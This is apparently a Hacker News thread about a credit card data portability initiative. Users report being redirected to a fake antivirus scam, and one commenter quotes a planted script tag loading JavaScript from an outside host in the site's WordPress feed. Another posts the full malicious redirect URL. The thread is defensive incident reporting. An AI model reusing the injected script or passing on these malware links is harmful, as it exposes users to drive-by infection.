4 ms·
Data portability in the Credit Card industry
- bryanjohnson 16y agoThe DataPortability Project has been at the forefront of addressing challenging data portability issues that affect all of us. We (Braintree) are really excited to see our Credit Card Data Portability initiative be adopted by them. This is their first initiative for B2B data portability. We were unsure what to expect from our efforts but are really excited to see that it's starting to get traction. Original Credit Card Data Portability announcement: http://www.braintreepaymentsolutions.com/blog/data-portability http://www.braintreepaymentsolutions.com/blog/data-portabili... Open Letter to the CEO's of Authorize.net and Paypal: Help End the Credit Card Data Hostage Situation http://www.braintreepaymentsolutions.com/blog/open-letter-to-the-ceos-of-paypal-and-authorize-net-help-end-the-credit-card-data-hostage-situation http://www.braintreepaymentsolutions.com/blog/open-letter-to...
- pyre 16y agoClicking the DataPortability site the first time gave me some malicious ad that took over the whole window trying to get me to install some sort of Windows virus protection (even though I'm on Linux). The second time gets me to the site... Oddly enough the site doesn't seem to have any adverts on it (now that it's loaded)...
- srepetti 16y agoHas anyone else experienced this problem? We do not have any ads on the DPP site, I am unable to replicate the problem, and we would appreciate any additional information on this. Thanks. --Steve Repetti DataPortability Board Member
- gdfsgfdfgsdfg 16y agoYes, the exact same thing happened to me.
- dublinclontarf 16y agoSeems to be a bit of nasty Javascript on this page attempting to redirect. Avast stopped it on my end(XP user).
- epochwolf 16y agoI was redirected to http://tinyurl.com/preview.php?num=2fzqmwf http://tinyurl.com/preview.php?num=2fzqmwf Yes, I was redirected to a tinyurl. I have previews on.
- Avenger42 16y agoIt happened to me as well.
- woodall 16y agoIt is looking at cookies. If you already have a cookie for the site it wont work- try clearing cache. The js is here http://ie.eracou.com/3 http://ie.eracou.com/3 You need to upgrade/harden your WP install. http://www.google.com/search?client=ubuntu&channel=fs&q=wordpress+2.9.2+exploit&ie=utf-8&oe=utf-8 http://www.google.com/search?client=ubuntu&channel=fs... EDIT: Found it embedded in your feed http://blog.dataportability.org/feed/ http://blog.dataportability.org/feed/ </em><script src="http://ie.eracou.com/3></script></p> http://ie.eracou.com/3></script></p> ]]></content:encoded> I sent an email to your personal account. I would recommend puting it in your HN profile so it would be easier to contact you at a later point in time. If you would like I can scan all of your sites for more spyware/vulnerabilities. You can contact me at the address in my profile.
- deleted 16y ago[deleted]
- snitch 16y agoAs pyre I did get the same error also. Using Chrome, avg detected it. Directing to this site ----------------DO NOT CLICK-------------- "http://www1.software35.co.cc/?p=p52dcWplbW6HjsbIo22AgXOOipnVbWGWY4nT1m6uqI61h8WilnGbk3ucqqjOkorapZxqmGNwmJOakWGbX5WK1qWYpqvYnomqb1qtnaygnXaHk83Slm1Tqpud22qImaCjZJiSlGFqYGeTkpdxWKaemnWcrK3RZ5OVk5ycm2CcxaHDoJ/YocTGzJ2gpq%2BT0NWgYVqtp3VlanCaZZWaaWRiWqarlmqTYmefZZSYm2VsWJnInriMWKuimHVta24%3D http://www1.software35.co.cc/?p=p52dcWplbW6HjsbIo22AgXOOipnV...